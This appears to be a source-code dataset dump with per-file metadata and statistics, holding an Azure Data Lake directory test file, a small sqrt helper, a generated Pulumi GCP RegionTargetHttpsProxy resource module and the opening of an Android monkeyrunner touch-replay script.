dir_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, "olddirectory", credential=token)
dir_client.create_directory()
new_client = dir_client.rename_directory(dir_client.file_system_name+'/'+'newdirectory')
new_client.get_directory_properties()
self.assertEqual(new_client.path_name, "newdirectory")
@DataLakePreparer()
def test_get_properties(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
metadata = {'hello': 'world', 'number': '42'}
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory(metadata=metadata)
properties = directory_client.get_directory_properties()
# Assert
self.assertTrue(properties)
self.assertIsNotNone(properties.metadata)
self.assertEqual(properties.metadata['hello'], metadata['hello'])
@pytest.mark.live_test_only
@DataLakePreparer()
def test_using_directory_sas_to_read(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# SAS URL is calculated from storage key, so this test runs live only
client = self._create_directory_and_get_directory_client()
directory_name = client.path_name
# generate a token with directory level read permission
token = generate_directory_sas(
self.dsc.account_name,
self.file_system_name,
directory_name,
self.dsc.credential.account_key,
permission=DirectorySasPermissions(read=True),
expiry=datetime.utcnow() + timedelta(hours=1),
)
directory_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, directory_name,
credential=token)
access_control = directory_client.get_access_control()
self.assertIsNotNone(access_control)
@pytest.mark.live_test_only
@DataLakePreparer()
def test_using_directory_sas_to_create(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# SAS URL is calculated from storage key, so this test runs live only
# generate a token with directory level create permission
directory_name = self._get_directory_reference()
token = generate_directory_sas(
self.dsc.account_name,
self.file_system_name,
directory_name,
self.dsc.credential.account_key,
permission=DirectorySasPermissions(create=True),
expiry=datetime.utcnow() + timedelta(hours=1),
)
directory_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, directory_name,
credential=token)
response = directory_client.create_directory()
self.assertIsNotNone(response)
@pytest.mark.live_test_only
@DataLakePreparer()
def test_using_directory_sas_to_create_file(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# SAS URL is calculated from storage key, so this test runs live only
client = self._create_directory_and_get_directory_client()
directory_name = client.path_name
# generate a token with directory level read permission
token = generate_directory_sas(
self.dsc.account_name,
self.file_system_name,
directory_name,
self.dsc.credential.account_key,
permission=DirectorySasPermissions(create=True),
expiry=datetime.utcnow() + timedelta(hours=1),
)
directory_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, directory_name,
credential=token)
directory_client.create_sub_directory("subdir")
with self.assertRaises(HttpResponseError):
directory_client.delete_directory()
@DataLakePreparer()
def test_using_directory_sas_to_create_file(self, datalake_storage_account_name, datalake_storage_account_key):
newest_api_version = _SUPPORTED_API_VERSIONS[-1]
service_client = DataLakeServiceClient("https://abc.dfs.core.windows.net", credential='fake')
filesys_client = service_client.get_file_system_client("filesys")
dir_client = DataLakeDirectoryClient("https://abc.dfs.core.windows.net", "filesys", "dir", credential='fake')
file_client = dir_client.get_file_client("file")
self.assertEqual(service_client.api_version, newest_api_version)
self.assertEqual(filesys_client.api_version, newest_api_version)
self.assertEqual(dir_client.api_version, newest_api_version)
self.assertEqual(file_client.api_version, newest_api_version)
service_client2 = DataLakeServiceClient("https://abc.dfs.core.windows.net", credential='fake', api_version="2019-02-02")
filesys_client2 = service_client2.get_file_system_client("filesys")
dir_client2 = DataLakeDirectoryClient("https://abc.dfs.core.windows.net", "filesys", "dir", credential='fake', api_version="2019-02-02")
file_client2 = dir_client2.get_file_client("file")
self.assertEqual(service_client2.api_version, "2019-02-02")
self.assertEqual(filesys_client2.api_version, "2019-02-02")
self.assertEqual(dir_client2.api_version, "2019-02-02")
self.assertEqual(file_client2.api_version, "2019-02-02")
# ------------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
| 53.120175
| 160
| 0.722476
| 6,924
| 60,557
| 5.889081
| 0.049971
| 0.085344
| 0.096037
| 0.056749
| 0.867716
| 0.846061
| 0.82551
| 0.802139
| 0.781832
| 0.768197
| 0
| 0.007736
| 0.197417
| 60,557
| 1,139
| 161
| 53.166813
| 0.831242
| 0.060769
| 0
| 0.717857
| 0
| 0.002381
| 0.034263
| 0.013564
| 0.00119
| 0
| 0
| 0
| 0.178571
| 1
| 0.071429
| false
| 0.002381
| 0.013095
| 0.00119
| 0.096429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
16127718f5659a73712604e9f998f2ca2f2eca65
| 90
|
py
|
Python
|
grayscale/math/sqrt.py
|
KennethanCeyer/grayscale
|
646a11ea47f2120f317e554c736d8054aa55c4c4
|
[
"MIT"
] | null | null | null |
grayscale/math/sqrt.py
|
KennethanCeyer/grayscale
|
646a11ea47f2120f317e554c736d8054aa55c4c4
|
[
"MIT"
] | null | null | null |
grayscale/math/sqrt.py
|
KennethanCeyer/grayscale
|
646a11ea47f2120f317e554c736d8054aa55c4c4
|
[
"MIT"
] | null | null | null |
from math import sqrt as math_sqrt
def sqrt(x: float) -> float:
return math_sqrt(x)
| 15
| 34
| 0.7
| 16
| 90
| 3.8125
| 0.5625
| 0.262295
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.211111
| 90
| 5
| 35
| 18
| 0.859155
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
16250831a9481f468d951485788eb7e11532980b
| 30,895
|
py
|
Python
|
sdk/python/pulumi_gcp/compute/region_target_https_proxy.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 121
|
2018-06-18T19:16:42.000Z
|
2022-03-31T06:06:48.000Z
|
sdk/python/pulumi_gcp/compute/region_target_https_proxy.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 492
|
2018-06-22T19:41:03.000Z
|
2022-03-31T15:33:53.000Z
|
sdk/python/pulumi_gcp/compute/region_target_https_proxy.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 43
|
2018-06-19T01:43:13.000Z
|
2022-03-23T22:43:37.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['RegionTargetHttpsProxyArgs', 'RegionTargetHttpsProxy']
@pulumi.input_type
class RegionTargetHttpsProxyArgs:
def __init__(__self__, *,
ssl_certificates: pulumi.Input[Sequence[pulumi.Input[str]]],
url_map: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a RegionTargetHttpsProxy resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssl_certificates: A list of RegionSslCertificate resources that are used to authenticate
connections between users and the load balancer. Currently, exactly
one SSL certificate must be specified.
:param pulumi.Input[str] url_map: A reference to the RegionUrlMap resource that defines the mapping from URL
to the RegionBackendService.
:param pulumi.Input[str] description: An optional description of this resource.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] region: The Region in which the created target https proxy should reside.
If it is not provided, the provider region is used.
"""
pulumi.set(__self__, "ssl_certificates", ssl_certificates)
pulumi.set(__self__, "url_map", url_map)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if project is not None:
pulumi.set(__self__, "project", project)
if region is not None:
pulumi.set(__self__, "region", region)
@property
@pulumi.getter(name="sslCertificates")
def ssl_certificates(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
A list of RegionSslCertificate resources that are used to authenticate
connections between users and the load balancer. Currently, exactly
one SSL certificate must be specified.
"""
return pulumi.get(self, "ssl_certificates")
@ssl_certificates.setter
def ssl_certificates(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "ssl_certificates", value)
@property
@pulumi.getter(name="urlMap")
def url_map(self) -> pulumi.Input[str]:
"""
A reference to the RegionUrlMap resource that defines the mapping from URL
to the RegionBackendService.
"""
return pulumi.get(self, "url_map")
@url_map.setter
def url_map(self, value: pulumi.Input[str]):
pulumi.set(self, "url_map", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The Region in which the created target https proxy should reside.
If it is not provided, the provider region is used.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@pulumi.input_type
class _RegionTargetHttpsProxyState:
def __init__(__self__, *,
creation_timestamp: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
proxy_id: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
self_link: Optional[pulumi.Input[str]] = None,
ssl_certificates: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
url_map: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering RegionTargetHttpsProxy resources.
:param pulumi.Input[str] creation_timestamp: Creation timestamp in RFC3339 text format.
:param pulumi.Input[str] description: An optional description of this resource.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[int] proxy_id: The unique identifier for the resource.
:param pulumi.Input[str] region: The Region in which the created target https proxy should reside.
If it is not provided, the provider region is used.
:param pulumi.Input[str] self_link: The URI of the created resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssl_certificates: A list of RegionSslCertificate resources that are used to authenticate
connections between users and the load balancer. Currently, exactly
one SSL certificate must be specified.
:param pulumi.Input[str] url_map: A reference to the RegionUrlMap resource that defines the mapping from URL
to the RegionBackendService.
"""
if creation_timestamp is not None:
pulumi.set(__self__, "creation_timestamp", creation_timestamp)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if project is not None:
pulumi.set(__self__, "project", project)
if proxy_id is not None:
pulumi.set(__self__, "proxy_id", proxy_id)
if region is not None:
pulumi.set(__self__, "region", region)
if self_link is not None:
pulumi.set(__self__, "self_link", self_link)
if ssl_certificates is not None:
pulumi.set(__self__, "ssl_certificates", ssl_certificates)
if url_map is not None:
pulumi.set(__self__, "url_map", url_map)
@property
@pulumi.getter(name="creationTimestamp")
def creation_timestamp(self) -> Optional[pulumi.Input[str]]:
"""
Creation timestamp in RFC3339 text format.
"""
return pulumi.get(self, "creation_timestamp")
@creation_timestamp.setter
def creation_timestamp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "creation_timestamp", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="proxyId")
def proxy_id(self) -> Optional[pulumi.Input[int]]:
"""
The unique identifier for the resource.
"""
return pulumi.get(self, "proxy_id")
@proxy_id.setter
def proxy_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "proxy_id", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The Region in which the created target https proxy should reside.
If it is not provided, the provider region is used.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> Optional[pulumi.Input[str]]:
"""
The URI of the created resource.
"""
return pulumi.get(self, "self_link")
@self_link.setter
def self_link(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "self_link", value)
@property
@pulumi.getter(name="sslCertificates")
def ssl_certificates(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of RegionSslCertificate resources that are used to authenticate
connections between users and the load balancer. Currently, exactly
one SSL certificate must be specified.
"""
return pulumi.get(self, "ssl_certificates")
@ssl_certificates.setter
def ssl_certificates(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssl_certificates", value)
@property
@pulumi.getter(name="urlMap")
def url_map(self) -> Optional[pulumi.Input[str]]:
"""
A reference to the RegionUrlMap resource that defines the mapping from URL
to the RegionBackendService.
"""
return pulumi.get(self, "url_map")
@url_map.setter
def url_map(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url_map", value)
class RegionTargetHttpsProxy(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
ssl_certificates: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
url_map: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Represents a RegionTargetHttpsProxy resource, which is used by one or more
forwarding rules to route incoming HTTPS requests to a URL map.
To get more information about RegionTargetHttpsProxy, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/rest/v1/regionTargetHttpsProxies)
* How-to Guides
* [Official Documentation](https://cloud.google.com/compute/docs/load-balancing/http/target-proxies)
## Example Usage
### Region Target Https Proxy Basic
```python
import pulumi
import pulumi_gcp as gcp
default_region_ssl_certificate = gcp.compute.RegionSslCertificate("defaultRegionSslCertificate",
region="us-central1",
private_key=(lambda path: open(path).read())("path/to/private.key"),
certificate=(lambda path: open(path).read())("path/to/certificate.crt"))
default_region_health_check = gcp.compute.RegionHealthCheck("defaultRegionHealthCheck",
region="us-central1",
http_health_check=gcp.compute.RegionHealthCheckHttpHealthCheckArgs(
port=80,
))
default_region_backend_service = gcp.compute.RegionBackendService("defaultRegionBackendService",
region="us-central1",
protocol="HTTP",
load_balancing_scheme="INTERNAL_MANAGED",
timeout_sec=10,
health_checks=[default_region_health_check.id])
default_region_url_map = gcp.compute.RegionUrlMap("defaultRegionUrlMap",
region="us-central1",
description="a description",
default_service=default_region_backend_service.id,
host_rules=[gcp.compute.RegionUrlMapHostRuleArgs(
hosts=["mysite.com"],
path_matcher="allpaths",
)],
path_matchers=[gcp.compute.RegionUrlMapPathMatcherArgs(
name="allpaths",
default_service=default_region_backend_service.id,
path_rules=[gcp.compute.RegionUrlMapPathMatcherPathRuleArgs(
paths=["/*"],
service=default_region_backend_service.id,
)],
)])
default_region_target_https_proxy = gcp.compute.RegionTargetHttpsProxy("defaultRegionTargetHttpsProxy",
region="us-central1",
url_map=default_region_url_map.id,
ssl_certificates=[default_region_ssl_certificate.id])
```
## Import
RegionTargetHttpsProxy can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/regionTargetHttpsProxy:RegionTargetHttpsProxy default projects/{{project}}/regions/{{region}}/targetHttpsProxies/{{name}}
```
```sh
$ pulumi import gcp:compute/regionTargetHttpsProxy:RegionTargetHttpsProxy default {{project}}/{{region}}/{{name}}
```
```sh
$ pulumi import gcp:compute/regionTargetHttpsProxy:RegionTargetHttpsProxy default {{region}}/{{name}}
```
```sh
$ pulumi import gcp:compute/regionTargetHttpsProxy:RegionTargetHttpsProxy default {{name}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: An optional description of this resource.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] region: The Region in which the created target https proxy should reside.
If it is not provided, the provider region is used.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssl_certificates: A list of RegionSslCertificate resources that are used to authenticate
connections between users and the load balancer. Currently, exactly
one SSL certificate must be specified.
:param pulumi.Input[str] url_map: A reference to the RegionUrlMap resource that defines the mapping from URL
to the RegionBackendService.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: RegionTargetHttpsProxyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Represents a RegionTargetHttpsProxy resource, which is used by one or more
forwarding rules to route incoming HTTPS requests to a URL map.
To get more information about RegionTargetHttpsProxy, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/rest/v1/regionTargetHttpsProxies)
* How-to Guides
* [Official Documentation](https://cloud.google.com/compute/docs/load-balancing/http/target-proxies)
## Example Usage
### Region Target Https Proxy Basic
```python
import pulumi
import pulumi_gcp as gcp
default_region_ssl_certificate = gcp.compute.RegionSslCertificate("defaultRegionSslCertificate",
region="us-central1",
private_key=(lambda path: open(path).read())("path/to/private.key"),
certificate=(lambda path: open(path).read())("path/to/certificate.crt"))
default_region_health_check = gcp.compute.RegionHealthCheck("defaultRegionHealthCheck",
region="us-central1",
http_health_check=gcp.compute.RegionHealthCheckHttpHealthCheckArgs(
port=80,
))
default_region_backend_service = gcp.compute.RegionBackendService("defaultRegionBackendService",
region="us-central1",
protocol="HTTP",
load_balancing_scheme="INTERNAL_MANAGED",
timeout_sec=10,
health_checks=[default_region_health_check.id])
default_region_url_map = gcp.compute.RegionUrlMap("defaultRegionUrlMap",
region="us-central1",
description="a description",
default_service=default_region_backend_service.id,
host_rules=[gcp.compute.RegionUrlMapHostRuleArgs(
hosts=["mysite.com"],
path_matcher="allpaths",
)],
path_matchers=[gcp.compute.RegionUrlMapPathMatcherArgs(
name="allpaths",
default_service=default_region_backend_service.id,
path_rules=[gcp.compute.RegionUrlMapPathMatcherPathRuleArgs(
paths=["/*"],
service=default_region_backend_service.id,
)],
)])
default_region_target_https_proxy = gcp.compute.RegionTargetHttpsProxy("defaultRegionTargetHttpsProxy",
region="us-central1",
url_map=default_region_url_map.id,
ssl_certificates=[default_region_ssl_certificate.id])
```
## Import
RegionTargetHttpsProxy can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/regionTargetHttpsProxy:RegionTargetHttpsProxy default projects/{{project}}/regions/{{region}}/targetHttpsProxies/{{name}}
```
```sh
$ pulumi import gcp:compute/regionTargetHttpsProxy:RegionTargetHttpsProxy default {{project}}/{{region}}/{{name}}
```
```sh
$ pulumi import gcp:compute/regionTargetHttpsProxy:RegionTargetHttpsProxy default {{region}}/{{name}}
```
```sh
$ pulumi import gcp:compute/regionTargetHttpsProxy:RegionTargetHttpsProxy default {{name}}
```
:param str resource_name: The name of the resource.
:param RegionTargetHttpsProxyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RegionTargetHttpsProxyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
ssl_certificates: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
url_map: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RegionTargetHttpsProxyArgs.__new__(RegionTargetHttpsProxyArgs)
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
__props__.__dict__["region"] = region
if ssl_certificates is None and not opts.urn:
raise TypeError("Missing required property 'ssl_certificates'")
__props__.__dict__["ssl_certificates"] = ssl_certificates
if url_map is None and not opts.urn:
raise TypeError("Missing required property 'url_map'")
__props__.__dict__["url_map"] = url_map
__props__.__dict__["creation_timestamp"] = None
__props__.__dict__["proxy_id"] = None
__props__.__dict__["self_link"] = None
super(RegionTargetHttpsProxy, __self__).__init__(
'gcp:compute/regionTargetHttpsProxy:RegionTargetHttpsProxy',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
creation_timestamp: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
proxy_id: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
self_link: Optional[pulumi.Input[str]] = None,
ssl_certificates: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
url_map: Optional[pulumi.Input[str]] = None) -> 'RegionTargetHttpsProxy':
"""
Get an existing RegionTargetHttpsProxy resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] creation_timestamp: Creation timestamp in RFC3339 text format.
:param pulumi.Input[str] description: An optional description of this resource.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[int] proxy_id: The unique identifier for the resource.
:param pulumi.Input[str] region: The Region in which the created target https proxy should reside.
If it is not provided, the provider region is used.
:param pulumi.Input[str] self_link: The URI of the created resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssl_certificates: A list of RegionSslCertificate resources that are used to authenticate
connections between users and the load balancer. Currently, exactly
one SSL certificate must be specified.
:param pulumi.Input[str] url_map: A reference to the RegionUrlMap resource that defines the mapping from URL
to the RegionBackendService.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RegionTargetHttpsProxyState.__new__(_RegionTargetHttpsProxyState)
__props__.__dict__["creation_timestamp"] = creation_timestamp
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
__props__.__dict__["proxy_id"] = proxy_id
__props__.__dict__["region"] = region
__props__.__dict__["self_link"] = self_link
__props__.__dict__["ssl_certificates"] = ssl_certificates
__props__.__dict__["url_map"] = url_map
return RegionTargetHttpsProxy(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="creationTimestamp")
def creation_timestamp(self) -> pulumi.Output[str]:
"""
Creation timestamp in RFC3339 text format.
"""
return pulumi.get(self, "creation_timestamp")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
An optional description of this resource.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@property
@pulumi.getter(name="proxyId")
def proxy_id(self) -> pulumi.Output[int]:
"""
The unique identifier for the resource.
"""
return pulumi.get(self, "proxy_id")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
The Region in which the created target https proxy should reside.
If it is not provided, the provider region is used.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> pulumi.Output[str]:
"""
The URI of the created resource.
"""
return pulumi.get(self, "self_link")
@property
@pulumi.getter(name="sslCertificates")
def ssl_certificates(self) -> pulumi.Output[Sequence[str]]:
"""
A list of RegionSslCertificate resources that are used to authenticate
connections between users and the load balancer. Currently, exactly
one SSL certificate must be specified.
"""
return pulumi.get(self, "ssl_certificates")
@property
@pulumi.getter(name="urlMap")
def url_map(self) -> pulumi.Output[str]:
"""
A reference to the RegionUrlMap resource that defines the mapping from URL
to the RegionBackendService.
"""
return pulumi.get(self, "url_map")
| 44.905523
| 158
| 0.644247
| 3,513
| 30,895
| 5.504697
| 0.079135
| 0.064278
| 0.066605
| 0.056883
| 0.884011
| 0.864257
| 0.843572
| 0.833178
| 0.826507
| 0.799514
| 0
| 0.00471
| 0.264735
| 30,895
| 687
| 159
| 44.970888
| 0.846584
| 0.49063
| 0
| 0.679577
| 1
| 0
| 0.08795
| 0.009637
| 0
| 0
| 0
| 0
| 0
| 1
| 0.161972
| false
| 0.003521
| 0.017606
| 0
| 0.278169
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1634b06bdc61adc98a860acf53577605abcf0be9
| 1,339
|
py
|
Python
|
utility/refined_events/gallary_record.py
|
EfficientAI/efficient_cv
|
e308f229e4d99da86ad56f87f3a78b2c81f27ca5
|
[
"MIT"
] | null | null | null |
utility/refined_events/gallary_record.py
|
EfficientAI/efficient_cv
|
e308f229e4d99da86ad56f87f3a78b2c81f27ca5
|
[
"MIT"
] | null | null | null |
utility/refined_events/gallary_record.py
|
EfficientAI/efficient_cv
|
e308f229e4d99da86ad56f87f3a78b2c81f27ca5
|
[
"MIT"
] | null | null | null |
from com.android.monkeyrunner import MonkeyRunner
from com.android.monkeyrunner import MonkeyDevice
print('Connecting to device...')
device = MonkeyRunner.waitForConnection()
print('Connected to device')
# Reproduce action log from here
print('Start to reproduce action log')
device.touch(540, 1696, MonkeyDevice.DOWN_AND_UP)
print('Executing : device.touch(540, 1696, MonkeyDevice.DOWN_AND_UP)')
